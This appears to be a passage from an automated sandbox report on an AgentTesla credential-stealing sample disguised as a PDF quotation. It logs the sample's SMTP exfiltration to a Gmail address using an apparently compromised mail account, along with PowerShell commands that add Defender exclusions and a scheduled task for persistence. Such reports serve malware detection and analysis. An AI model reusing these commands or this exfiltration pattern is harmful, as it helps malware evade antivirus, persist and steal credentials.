                                                      Jun 26, 2022 09:22:47.229017019 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.282099962 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.283965111 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.335561991 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.335999012 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.422240019 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.423346043 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.474385977 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.474662066 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.531780958 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.531959057 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.580188990 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.580260992 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.581243038 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.581294060 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.582186937 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.582243919 CEST49741587192.168.2.3193.46.84.142
                                                      Jun 26, 2022 09:22:47.632070065 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.633296013 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.636192083 CEST58749741193.46.84.142192.168.2.3
                                                      Jun 26, 2022 09:22:47.689951897 CEST49741587192.168.2.3193.46.84.142
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jun 26, 2022 09:22:44.086308002 CEST4931653192.168.2.38.8.8.8
                                                      Jun 26, 2022 09:22:44.153042078 CEST53493168.8.8.8192.168.2.3
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jun 26, 2022 09:22:44.086308002 CEST192.168.2.38.8.8.80x456bStandard query (0)mail.bonsa.ltA (IP address)IN (0x0001)
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jun 26, 2022 09:22:44.153042078 CEST8.8.8.8192.168.2.30x456bNo error (0)mail.bonsa.lt193.46.84.142A (IP address)IN (0x0001)
                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Jun 26, 2022 09:22:47.228558064 CEST58749741193.46.84.142192.168.2.3220 jonas.domenai.lt ESMTP Exim 4.94.2 Sun, 26 Jun 2022 10:22:47 +0300
                                                      Jun 26, 2022 09:22:47.229017019 CEST49741587192.168.2.3193.46.84.142EHLO 377142
                                                      Jun 26, 2022 09:22:47.282099962 CEST58749741193.46.84.142192.168.2.3250-jonas.domenai.lt Hello 377142 [102.129.143.61]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPE_CONNECT
                                                      250-AUTH PLAIN LOGIN
                                                      250-STARTTLS
                                                      250 HELP
                                                      Jun 26, 2022 09:22:47.283965111 CEST49741587192.168.2.3193.46.84.142AUTH login Z2llZHJlQGJvbnNhLmx0
                                                      Jun 26, 2022 09:22:47.335561991 CEST58749741193.46.84.142192.168.2.3334 UGFzc3dvcmQ6
                                                      Jun 26, 2022 09:22:47.422240019 CEST58749741193.46.84.142192.168.2.3235 Authentication succeeded
                                                      Jun 26, 2022 09:22:47.423346043 CEST49741587192.168.2.3193.46.84.142MAIL FROM:<giedre@bonsa.lt>
                                                      Jun 26, 2022 09:22:47.474385977 CEST58749741193.46.84.142192.168.2.3250 OK
                                                      Jun 26, 2022 09:22:47.474662066 CEST49741587192.168.2.3193.46.84.142RCPT TO:<markjeffxnt3@gmail.com>
                                                      Jun 26, 2022 09:22:47.531780958 CEST58749741193.46.84.142192.168.2.3250 Accepted
                                                      Jun 26, 2022 09:22:47.531959057 CEST49741587192.168.2.3193.46.84.142DATA
                                                      Jun 26, 2022 09:22:47.580260992 CEST58749741193.46.84.142192.168.2.3354 Enter message, ending with "." on a line by itself
                                                      Jun 26, 2022 09:22:47.582243919 CEST49741587192.168.2.3193.46.84.142.
                                                      Jun 26, 2022 09:22:47.636192083 CEST58749741193.46.84.142192.168.2.3250 OK id=1o5MbX-0000zn-Hx

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:09:22:06
                                                      Start date:26/06/2022
                                                      Path:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe"
                                                      Imagebase:0x280000
                                                      File size:625152 bytes
                                                      MD5 hash:0BFB0AB1E8C7EC929E44D70C196B4D21
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.300201065.000000000375A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      Target ID:4
                                                      Start time:09:22:22
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      Imagebase:0x1130000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Target ID:5
                                                      Start time:09:22:24
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:6
                                                      Start time:09:22:25
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                                                      Imagebase:0x1130000
                                                      File size:430592 bytes
                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Target ID:7
                                                      Start time:09:22:25
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:8
                                                      Start time:09:22:25
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                                                      Imagebase:0xc0000
                                                      File size:185856 bytes
                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:9
                                                      Start time:09:22:26
                                                      Start date:26/06/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7c9170000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:10
                                                      Start time:09:22:29
                                                      Start date:26/06/2022
                                                      Path:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      Imagebase:0xa60000
                                                      File size:625152 bytes
                                                      MD5 hash:0BFB0AB1E8C7EC929E44D70C196B4D21
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292992655.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.292589787.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.294076711.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.510843577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000000.293458897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      No disassembly